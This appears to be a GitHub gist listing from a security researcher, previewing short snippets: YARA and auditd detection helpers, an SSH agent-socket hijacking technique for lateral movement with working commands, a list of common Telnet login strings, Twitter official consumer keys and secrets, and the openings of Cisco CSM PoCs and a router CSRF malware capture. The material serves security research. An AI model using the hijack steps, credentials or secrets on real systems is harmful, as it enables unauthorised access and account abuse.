Skip to content

Instantly share code, notes, and snippets.

View timb-machine's full-sized avatar

Tim Brown timb-machine

View GitHub Profile
@timb-machine
timb-machine / aix.yara
Created February 28, 2021 19:18
aix.yara
rule aix {
meta:
author = "Tim Brown @timb_machine"
description = "AIX binary"
strings:
$libca = "libc.a"
$text = ".text"
$data = ".data"
condition:
$libca and $text and $data
@timb-machine
timb-machine / auditd-generate-rule.sh
Last active August 30, 2025 17:01
auditd-generate-rule.sh
#!/bin/sh
generate_file_rule () {
filepermissions="${1}"
rulename="${2}"
while read filename
do
printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
done
}

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@timb-machine
timb-machine / Telnet authentication strings
Created February 13, 2021 19:36
Telnet authentication strings
461 root
392
160 admin
94 default
39 guest
24 support
21 user
20 1234
16 password
15 12345
@timb-machine
timb-machine / key.md
Created November 22, 2020 07:58
Twitter (un)official Consumer Key

Twitter Official Consumer Key

Twitter for Android

type:            PIN
Consumer key:    3nVuSoBZnx6U4vzUxf5w
Consumer secret: Bcs59EFbbsdF6Sl9Ng71smgStWEGwXXKSjYvPVt7qys

Twitter for iPhone

type:            PIN

Consumer key: IQKbtAYlXLripLGPWd0HUA

@timb-machine
timb-machine / CSM_pocs.md
Last active December 28, 2020 14:56 — forked from Frycos/CSM_pocs.md
CSM PoCs

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@timb-machine
timb-machine / Router CSRF malware blob
Last active February 13, 2021 23:43
Router CSRF malware blob
// Taken from https://urlscan.io/result/ce20fb52-b4d9-45dd-8034-fb9eae99350e#transactions:
// Request 1 for loadtxt.php:
// Blob 2 from response decoded with base64decode.org:
<!DOCTYPE html>
<html>
<head>
<title></title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
</head>
@timb-machine
timb-machine / cvss-to-kill-chain-phase.pl
Last active August 30, 2025 17:02
cvss-to-kill-chain-phase.pl
#!/usr/bin/perl -w
use strict;
use Data::Dumper;
my %killchainmodel;
my $cvssmetric;
my $metricname;
my $metricscore;
my $phasename;
@timb-machine
timb-machine / CVSS to kill chain phase
Last active July 11, 2020 18:51
CVSS to kill chain phase
Zoom client application chat Giphy arbitrary file write
https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
Tims-MacBook-Air:~ timb$ ./cvss-to-kill-chain-phase.pl CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
Delivery
0.6
Weaponisation
0.3
Command & Control